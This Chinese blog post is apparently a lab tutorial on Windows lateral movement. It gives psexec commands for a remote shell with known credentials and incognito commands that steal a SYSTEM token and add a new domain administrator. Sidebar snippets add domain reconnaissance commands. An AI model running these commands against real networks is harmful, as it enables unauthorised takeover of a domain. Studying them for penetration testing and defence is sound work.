使用incognito劫持身份&psexec调用远程cmd

最新推荐文章于 2024-05-14 13:25:00 发布
最新推荐文章于 2024-05-14 13:25:00 发布
阅读量1.3k 收藏 2
点赞数
文章标签: 服务器 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45612728/article/details/122700067
版权

incognito是在kali上可以使用来进行提权的,主要的作用是用于进行提权的或者用来劫持身份的.如果需要进行这些操作,前提是需要开启smb服务,也就是445端口才可以,可以使用一些工具进行爆破smb的账号和密码.

  • 以下实验用到的是一台03的服务器和一台win7的攻击机.
  • 03的ip地址为:192.168.0.212,账号为1,密码也是1
  • win7的ip地址为:192.168.0.207

1.使用psexec软件进行远程调用03cmd的cmd.

win7执行以下命令:psexec.exe \192.168.0.212 -u 1 -p 1 cmd
在这里插入图片描述

2.使用普通用户进行劫持域管理的身份.前提是03必须是加入域中,并且03是存在abc\administrator的用户身份进程.也就是曾经使用过03登录域服务器的.从而进行劫持身份,然后创建一个新的域管理员进行其他的操作.

1.incognito.exe -h 192.168.0.212 -u 1 -p 1 list_tokens -u  #查找03的可用身份进行劫持
2.incognito.exe -h 192.168.0.212 -u 1 -p 1 execute -c "NT AUTHORITY\SYSTEM" cmd.exe   #劫持system身份
3.然后使用cmd命令进行创建一个域控出来,因为这个域控的身份是有可能失效的.
net user 1 1 /domain /add #创建域账号
net group "domain admins" 1 /domain /add #添加到域控组中
请再坚持一下
关注
Psexec远程CMD工具
12-31
psexec是一个远程执行工具,你可以像使用telnet一样使用它。
PsExec连接远程机器的cmd
andylauhuang2012的专栏
02-26 3322
实用工具(如 Telnet)和远程控制程序(如 Symantec 的 PC Anywhere)使您可以在远程系统上执行程序,但安装它们非常困难,并且需要您在想要访问的远程系统上安装客户端软件。PsExec 是一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。PsExec 最强大的功能之一是在远程系统和远程支持
Windows 远程控制之 PsExec
一直被模仿,从未被超越
01-12 2597
PsExec 是一种轻量级 telnet 替代品,可让你在其他系统上执行进程,并为控制台应用程序提供完整交互性,而无需手动安装客户端软件。PsExec 最强大的用途包括在远程系统上启动交互式命令提示符,以及 IpConfig 等远程启用工具,否则无法显示有关远程系统的信息。远程打开 cmd 命令。
PsExec用法及远程操控执行脚本举例
Penn Li的博客
07-29 2万+
PsExec用法及远程操控执行脚本举例 一、 简介 PsExec是一种轻量级的telnet替代品,可以在其他系统上执行进程,完成控制台应用程序的完全交互,而无需手动安装客户端软件。PsExec强大的用途是在远程系统上启动交互式命令提示,远程启动执行包括IpConfig等cmd命令,故能够远程启动服务器上程序、脚本等。 二、 环境配置 2.1 安装PsTools 安装PsTools到执行远程命令的本...
psexec实现控制多台电脑的cmd
lilien的博客
06-23 981
psexec实现控制多台电脑的cmd
使用Psexec.exe 命令行远程windows执行命令
聆听风雨的博客
04-10 4433
背景: 博主今天遇到个问题,就是通过远程桌面远程公司电脑的时候一直卡在请稍等页面无法操作。这种问题一般重启即可解决,但由于周末公司也没人帮忙重启。所以想到有没有可以像linux那样命令行的方式远程到windows。结果一搜,还真有。 1、下载psexec PsExec - Windows Sysinternals | Microsoft Docs 2、命令行链接 PsExec.exe \\192.168.1.1 -u administrator -p password -i -c cmd.exe
Incognito Plus! Search images, videos &&....-crx插件
04-04
单击名为“Incognito Plus!搜索,图像,视频&......”的子菜单,然后从标准,图像或视频中进行选择以搜索Google.com的选定结果类型。 默认为Google.com。 这是扩展名的免费版本。 付费版本(只需0.99 US)为您...
第62天:权限提升-烂土豆&dll劫持&引号路径&服务权限1
08-03
在Web环境下,攻击者可以先获取到较低级别的权限,如Web服务器权限,然后通过上传并执行烂土豆程序(如potato.exe),结合令牌窃取工具,如Incognito模块,来窃取SYSTEM权限,实现权限提升。 其次,DLL劫持是利用...
is-incognito-mode::bust_in_silhouette:用于识别浏览器是否处于隐身模式的功能:eyes:
04-28
如何使用 要安装库: # yarn yarn add is-incognito-mode # npm npm install is-incognito-mode --save // ES6 modules import isIncognito from 'is-incognito-mode' ; // CommonJS modules const isIncognito = ...
Search Incognito-crx插件
03-19
通过将可能跟踪到的搜索重定向到以隐私为重点的搜索引擎Search Incognito,可以使您的搜索保持私密。 大公司会跟踪您的搜索并在Internet上关注您。通过将可能跟踪到的搜索重定向到以隐私为重点的搜索引擎Search ...
incognitodhcpv6.zip
04-07
incognito dhcp server,docsis 后能管理服务,附件是dhcpv6服务器的配置,共大家参考
Incognito Mode-crx插件
04-04
因此,全面的隐私保护还需要结合其他的隐私策略,比如使用虚拟身份、限制第三方cookies等。 在安装和使用"匿名模式-crx"时,用户需要确保从可信赖的来源下载,并了解其权限设置。因为扩展程序具有访问浏览器数据的...
远程执行命令的psexec工具的基本使用——简单、强大
热门推荐
Miss_Easy的专栏
08-19 2万+
关于psexec工具的基本使用——简单、强大 当你工作中需要执行远程命令时,就用到了psexecpsexec使用简单,但是功能却是很强大。下面就来介绍psexec的基本使用方法。 首先下载psexec [ psexec官方下载地址 ] psexec下载完成后,将psexec压缩包解压到你指定的一个路径,比如我将psexec的压缩包解压到d:\psexec 。 然后,我们
使用incognito重放身份验证令牌
weixin_30724853的博客
04-12 442
use incognito  list_tokens -u 查看系统令牌  \impersonate_token +令牌 伪造成功。 转载于:https://www.cnblogs.com/pangya/p/7975468.html
内网渗透篇
weixin_45808483的博客
02-28 2007
域信息搜集命令 1.查询当前环境 whoami && ipconfig /all 2.查询当前域用户 net user /domain 3.查询域控 net time 4.查询域工作组 net group /domain 5.查询域管理用户 net group "domain admins" /domain 6.查询有几台域控制器 需要域权限 net group "Domain controllers" 7.查找域...
2024年内网渗透TIPS总结(3),2024年最新2024Golang笔试真题
最新发布
2401_84925780的博客
05-14 857
中,krbtgt 的NTLM Hash 又是固定的,所以只要得到 krbtgt 的 NTLM Hash,就可以伪造 TGT 和Logon Session Key 来进入下一步 Client 与 TGS 的交。在使用 PsExec 执行远程命令时,会在目标系统中创建一个 psexec 的服务,命令执行完后,psexec 服务将被自动删除。由于创建或删除服务时会。机上创建一个psexec 服务,并在本地磁盘中生成一个名为 PSEXESVC 的二进制文件,然后通过psexec 服务运行命令,运行结束后删除服务。
AccessToken 的窃取与利用
qq_63527808的博客
01-20 600
注: 两种 token 只在系统重启后清除具有 Delegation token 的用户在注销后,该 Token 将变成Impersonation token,依旧有效。(1)Delegation Token:授权令牌,它支持交互式会话登录(例如本地用户直接登录、远程桌面登录访问)(2)Impresonation Token:模拟令牌,它是非交互的会话(例如使用net use。上述此处进行模拟:1、先登录域用户,注销后登录管理员账户。二、在 Windows 下使用工具。三、在 MSF 中使用
内网渗透测试:Windows权限提升思路
qq_45521281的博客
02-21 2261
我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录Windows系统内核溢出漏洞提权1. 手动查找系统潜在漏洞2. 自动查找系统潜在漏洞3. 选择漏洞并利用Windows系统错误配置漏洞提权Trusted Service Paths漏洞(可信任服务路径漏洞)系统服务错误权限配置漏洞计划任务与AccessChk使用AccessChk使用自动安装配置文件AlwaysInstallElev.
【kali-权限提升】(4.1)假冒令牌攻击、本地提权:流程
08-07 1150
【kali-权限提升】假冒令牌攻击、本地提权
CMD chrome
02-28
CMD是Windows操作系统中的命令行界面,而Chrome是一款常用的网页浏览器。在CMD中可以通过命令来启动Chrome浏览器。 要在CMD中启动Chrome浏览器,可以使用以下命令: ``` start chrome ``` 这个命令会打开一个新的Chrome浏览器窗口。 如果你想要在CMD中打开指定的网页,可以使用以下命令: ``` start chrome <URL> ``` 其中,`<URL>`是你要打开的网页的地址。 另外,你还可以使用一些其他的参数来控制Chrome的行为,例如: - `--incognito`:启动无痕模式 - `--new-window`:在新窗口中打开网页 - `--new-tab`:在新标签页中打开网页 希望以上信息对你有帮助!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值